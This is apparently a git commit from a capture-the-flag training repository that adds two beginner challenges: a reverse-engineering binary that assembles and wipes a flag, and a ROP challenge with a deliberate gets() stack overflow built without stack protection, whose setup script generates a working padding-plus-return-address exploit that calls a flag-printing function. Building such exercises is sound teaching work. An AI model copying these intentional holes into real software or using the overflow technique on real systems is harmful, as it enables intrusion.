Browse Source

make the ctf si3 proof

master
parent
commit
3bd97c861f
Signed by: govanify GPG Key ID: DE62E1E2A6145556
8 changed files with 250 additions and 2 deletions
  1. +3
    -0
      chals/intro_reverse/Makefile
  2. +102
    -0
      chals/intro_reverse/main.c
  3. +37
    -0
      chals/intro_reverse/setup.py
  4. +2
    -0
      chals/intro_rop/Makefile
  5. +47
    -0
      chals/intro_rop/main.c
  6. +55
    -0
      chals/intro_rop/setup.py
  7. +2
    -0
      infrastructure/nix/binaries.nix
  8. +2
    -2
      libchals.py

+ 3
- 0
chals/intro_reverse/Makefile View File

@ -0,0 +1,3 @@
all:
gcc -w -O0 -m32 main.c -no-pie -fno-stack-protector -o intro_reverse
strip intro_reverse

+ 102
- 0
chals/intro_reverse/main.c View File

@ -0,0 +1,102 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>
#include <stdint.h>
#define BUFSIZE 16
char *test[80];
//--JUNK CODE--
//--JUNK CODE--
void flag1() {
//--JUNK CODE--
//--JUNK CODE--
strcat(test,"FLAG_PART_1");
//--JUNK CODE--
//--JUNK CODE--
}
void flag2(unsigned int arg_check1) {
if (arg_check1 == 0xAABBCCD1) {
strcat(test,"FLAG_WRONG");
}
if (arg_check1 == 0xAABBCCD2) {
strcat(test,"FLAG_PART_2");
}
if (arg_check1 == 0xAABBCCD3) {
strcat(test,"FLAG_WRONG");
}
if (arg_check1 == 0xAABBCCD4) {
strcat(test,"FLAG_WRONG");
}
if (arg_check1 == 0xAABBCCD5) {
strcat(test,"FLAG_WRONG");
}
}
void flag3(unsigned int arg_check1) {
if (arg_check1 == 0xAABBCCD1) {
strcat(test,"FLAG_PART_3");
}
if (arg_check1 == 0xAABBCCD2) {
//--JUNK CODE--
//--JUNK CODE--
strcat(test,"FLAG_WRONG");
}
if (arg_check1 == 0xAABBCCD3) {
strcat(test,"FLAG_WRONG");
}
if (arg_check1 == 0xAABBCCD4) {
strcat(test,"FLAG_WRONG");
}
if (arg_check1 == 0xAABBCCD5) {
strcat(test,"FLAG_WRONG");
}
}
void xor(){
memset(test,0,strlen(test));
}
void xor2(){
memset(test,0,strlen(test));
}
void xor3(){
memset(test,0,strlen(test));
}
void vuln() {
flag1();
xor();
flag2(0xAABBCCD2);
xor2();
xor3();
flag3(0xAABBCCD1);
xor();
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
}

+ 37
- 0
chals/intro_reverse/setup.py View File

@ -0,0 +1,37 @@
import subprocess
import os
import sys
from colorama import Fore, Back, Style
# chals_out/chal_name/team_name so 3
sys.path.insert(1, os.path.join(sys.path[0], '../../..'))
from libchals import *
from pwn import *
context.log_level = 'error'
FNULL = open(os.devnull, 'w')
# junk code generation
write_junk_calls("main.c", 53, 3)
write_junk_calls("main.c", 23, 3)
write_junk_calls("main.c", 19)
write_junk_body("main.c", 14)
# replace flags in source file
f = open("flag.txt", "r")
flag=f.readline()
flag1=flag[:30]
flag2=flag[30:60]
flag3=flag[60:]
replace_text("main.c", "FLAG_PART_1", flag1)
replace_text("main.c", "FLAG_PART_2", flag2)
replace_text("main.c", "FLAG_PART_3", flag3)
replace_text_random_hash("main.c", "FLAG_WRONG", 30)
subprocess.call("make", stdout=FNULL, stderr=FNULL)
os.remove("main.c")
os.remove("Makefile")
os.remove("setup.py")
os.remove("flag.txt")

+ 2
- 0
chals/intro_rop/Makefile View File

@ -0,0 +1,2 @@
all:
gcc -O0 -m32 main.c -no-pie -fno-stack-protector -o intro_rop

+ 47
- 0
chals/intro_rop/main.c View File

@ -0,0 +1,47 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>
#include <stdint.h>
#define BUFSIZE 16
//--JUNK CODE--
//--JUNK CODE--
void execute_me() {
//--JUNK CODE--
//--JUNK CODE--
system("cat flag.txt");
//--JUNK CODE--
//--JUNK CODE--
}
void vuln() {
char buf[16];
printf("Vous savez quoi faire :) : ");
return gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
//--JUNK CODE--
//--JUNK CODE--
vuln();
}

+ 55
- 0
chals/intro_rop/setup.py View File

@ -0,0 +1,55 @@
import subprocess
import os
import sys
from subprocess import check_output
# chals_out/chal_name/team_name so 3
sys.path.insert(1, os.path.join(sys.path[0], '../../..'))
from libchals import *
from pwn import *
context.log_level = 'error'
FNULL = open(os.devnull, 'w')
# junk code generation
write_junk_calls("main.c", 44, 3)
write_junk_calls("main.c", 24, 3)
write_junk_calls("main.c", 19)
write_junk_body("main.c", 13)
subprocess.call("make", stdout=FNULL, stderr=FNULL)
# input correction
elf = ELF("intro_rop")
rop = ROP(elf)
execute_me = elf.symbols['execute_me']
padding = b'A' * 28
exploit = padding + p32(execute_me) # rop is saved as input
f = open("input", "wb")
f.write(exploit)
f.close()
# strip it after the ropchain building so they don't have the symbols but we do
subprocess.call(["strip", "intro_rop"], stdout=FNULL, stderr=FNULL)
# TESTING BINARY
f=open("flag.txt", 'r')
flag = f.readline()
try:
output = subprocess.check_output("./intro_rop < input", shell=True, stderr=subprocess.STDOUT)
except Exception as e:
output = str(e.output)
if not flag in output:
fail_test()
os.remove("main.c")
os.remove("Makefile")
os.remove("setup.py")
# solution
os.remove("input")

+ 2
- 0
infrastructure/nix/binaries.nix View File

@ -10,6 +10,8 @@ let
web_server = 64;
web_server_2 = 32;
access_security = 64;
intro_reverse = 32;
intro_rop = 32;
};
mkBinarySourcePath = teamName: challengeMeta: challengesBinarySources + "/${challengeMeta.name}/${teamName}";
genericInstallPhase = ''


+ 2
- 2
libchals.py View File

@ -49,12 +49,12 @@ def replace_text(fd, to_change, text):
fdd.writelines(buf)
fdd.close()
def replace_text_random_hash(fd, to_change):
def replace_text_random_hash(fd, to_change, size_hash=10):
fdd = open(fd, "r")
buf = fdd.readlines()
for i in range(0, len(buf)-1):
buf[i]=buf[i].replace(to_change,random_name(size=10, chars="0123456789abcdef"))
buf[i]=buf[i].replace(to_change,random_name(size=size_hash, chars="0123456789abcdef"))
fdd = open(fd, "w")
fdd.writelines(buf)


Loading…
Cancel
Save